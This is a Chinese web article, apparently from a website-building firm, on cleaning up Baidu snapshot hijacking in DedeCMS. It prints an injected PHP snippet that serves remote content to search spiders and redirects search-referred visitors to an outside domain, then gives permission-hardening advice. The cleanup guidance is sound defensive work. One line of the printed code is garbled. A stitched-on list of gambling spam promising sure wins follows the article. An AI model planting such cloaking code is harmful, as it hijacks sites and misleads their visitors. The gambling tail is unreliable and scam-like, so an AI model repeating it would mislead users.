dedecms百度快照被劫持如何解決

2018-11-24 14:13:11 濟南網站建設
dedecms百度快照劫持注入代碼防范及修正,很多站長做站的過程中,濟南網站建設都碰過百度快照被劫持等問題,明明已經修復模板文件了,還是沒有更新回正常的快照,以dedecms程序為例,
 
往往根目錄/index.php也被植入惡意代碼
 
比如:
<?php
if(strpos($_SERVER['HTTP_USER_AGENT'],"spider")||strpos($_SERVER["HTTP_USER_AGENT"],"google")>-1){ $str=file_get_contents("http://域名.com/");echo $str; } $domain=array('baidu','so'); [email protected]($_SERVER['HTTP_REFERER']); foreach ($domain as $v) { if (strpos($fromurl,$v)!==false) { $target="http://域名.com/index.html"; header("Location:".$target); exit; }}?>
 
單這段代碼就直接把搜索引擎蜘蛛搞暈,帶到別的惡意網址去。
 
把其刪掉,如果在index.php里沒找到,但還是存在類似的問題,可以用dw全站搜索下。
 
關于防范,空間,ftp賬號,權限,后臺賬號之類都需要設置下,不能太過簡單,
 
 如果有服務器或者VPS權限,將data、templets、uploads、a或html目錄, 設置可讀寫,不可執行的權限,
 
        include、member、plus、后臺管理目錄 設置為可執行腳本,可讀,但不可寫入(安裝了附加模塊的,book、ask、company、group 目錄同樣如此設置)。
网络捕鱼有人赢钱吗
百人牛牛稳赚 阿里娱乐1分快三是骗局吗 南航沈阳维修基地赚钱吗 如何做微博营销 魔龙世界什么职业好 胆拖投注如何计奖 谁有急速快乐十分平台 时时彩自动挂机稳赚 彩票走势怎么看规律 真钱炸金花手机版下载